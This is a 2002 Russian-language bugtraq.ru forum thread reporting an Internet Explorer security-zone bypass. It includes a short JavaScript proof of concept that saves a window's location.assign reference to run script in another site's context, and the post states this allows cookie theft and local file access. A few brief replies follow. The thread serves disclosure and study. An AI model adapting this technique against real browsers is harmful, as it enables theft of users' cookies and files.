информационная безопасность без паники и всерьез  подробно о проекте
			Анализ криптографических сетевых...   Модель надежности двухузлового...   Специальные марковские модели надежности...   Бэкдор в xz/liblzma, предназначенный...   Три миллиона электронных замков...   Doom на газонокосилках
	главная обзор RSN блог библиотека закон бред форум dnet о проекте
	bugtraq.ru / форум / site updates		Имя Пароль

ФОРУМ если вы видите этот текст, отключите в настройках форума использование JavaScript регистрация Легенда:   новое сообщение   закрытая нитка   новое сообщение   в закрытой нитке   старое сообщение	Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания. Новичкам также крайне полезно ознакомиться с данным документом. Обход зон безопасности в IE 05.10.02 02:26  Число просмотров: 1417 Автор: RedAndr UfaTeam <Андрей Рыжков> Статус: Member <"чистая" ссылка> Помимо кражи кук пользователя с произвольных сайтов, это > дает возможность получить доступ к локальным файлам - см. > пример 2. У меня AVP второй пример зарубил :) <site updates> Обход зон безопасности в IE 03.10.02 02:32   Publisher: dl <Dmitry Leonov> Отредактировано 03.10.02 02:55  Количество правок: 1 <"чистая" ссылка> Обход зон безопасности в IE пример 1,пример 2 http://www16.brinkster.com/liudieyu/SaveRef/SaveRef-MyPage.htm, http://jscript.dk/2002/10/sec/SaveRefLocalFile.html Сохранение ссылки на NewWindow.location.assign, где NewWindow - окно, созданное скриптом, позволяет выполнить произвольный скрипт в любой зоне безопасности: function f(){} w=window.open("nothing.htm","_blank","height=150 width=150 left=0 top=0"); f=w.location.assign; w.location.href="http://www.yahoo.com"; alert("wait for the page"); f("javascript:alert(document.body.innerHTML)"); Первой строчкой открываем окно с локальным файлом (возможно, и несуществующим), сохраняем ссылку н аэто окно, далее, открыв в нем страницу из другой зоны, вызываем код в ее контексте. Помимо кражи кук пользователя с произвольных сайтов, это дает возможность получить доступ к локальным файлам - см. пример 2. Полный текст Обход зон безопасности в IE 05.10.02 02:26   Автор: RedAndr UfaTeam <Андрей Рыжков> Статус: Member <"чистая" ссылка> Помимо кражи кук пользователя с произвольных сайтов, это > дает возможность получить доступ к локальным файлам - см. > пример 2. У меня AVP второй пример зарубил :) Обход зон безопасности в IE 07.10.02 22:57   Автор: Digital_Scream Статус: Незарегистрированный пользователь <"чистая" ссылка> Как на меня ничего особенного. Обход зон безопасности в IE сталь обычным делом. Есть способы на любой вкус, а это еще один :) 1

Copyright © 2001-2024 Dmitry Leonov

Page build time: 0 s

Design: Vadim Derkach